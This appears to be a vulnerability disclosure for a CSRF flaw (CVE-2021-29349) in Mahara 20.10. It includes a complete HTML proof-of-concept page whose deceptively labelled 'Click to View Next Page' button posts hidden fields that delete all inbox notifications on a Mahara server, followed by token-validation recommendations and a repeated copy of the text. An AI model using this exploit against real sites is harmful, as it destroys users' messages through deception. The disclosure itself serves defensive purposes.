Description: Cross Site Request Forgery (CSRF) that
allows a remote attacker to remove inbox-mail on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft the /inbox.php directory, which leads to removing all messages from a mailbox.
/* Email Box Exploit - CSRF */
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body, html {
height: 100%;
margin: 0;
}
.bg {
/* The image used */
background-image: url("https://avatars.githubusercontent.com/u/78818477?s=400&u=b18f9de63b3df28e6e1b4d2dc64303048aa5f5b5&v=4");
/* Full height */
height: 100%;
/* Center and scale the image nicely */
background-position: center;
background-repeat: no-repeat;
background-size: cover;
}
</style>
</head>
<body>
<div class="bg"></div>
<p>CSRF CVE-2021-29349 , After clicking below button all inbox maill messages will be deleted !!.</p>
</body>
<form enctype="multipart/form-data" method="POST" action="https://demo.mahara.org/module/multirecipientnotification/inbox.php"><table><input type hidden="text" value="Delete+all+notifications" name="submit">
<input type hidden="text" value="all" name="type">
<input type hidden="text" value="L8T0C4WDuMxzakwV" name="sesskey">
<input type hidden="text" value="" name="pieform_delete_all_notifications">
</table><input type="submit" value="Click to View Next Page"></form>
</html>
Recommendations :
1- Implement X-CSRF-TOKEN and make sure it's validating in back-end server as well
2- Implement an interceptor which appends token value to every (state-changing) request in custom request header X-XSRF-TOKEN-B
The text was updated successfully, but these errors were encountered:
Product : Mahara 20.10
Description: Cross Site Request Forgery (CSRF) that
allows a remote attacker to remove inbox-mail on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft the /inbox.php directory, which leads to removing all messages from a mailbox.
Video POC : Google Drive Video
POC :
Recommendations :
1- Implement
X-CSRF-TOKENand make sure it's validating in back-end server as well2- Implement an interceptor which appends token value to every (state-changing) request in custom request header
X-XSRF-TOKEN-BThe text was updated successfully, but these errors were encountered: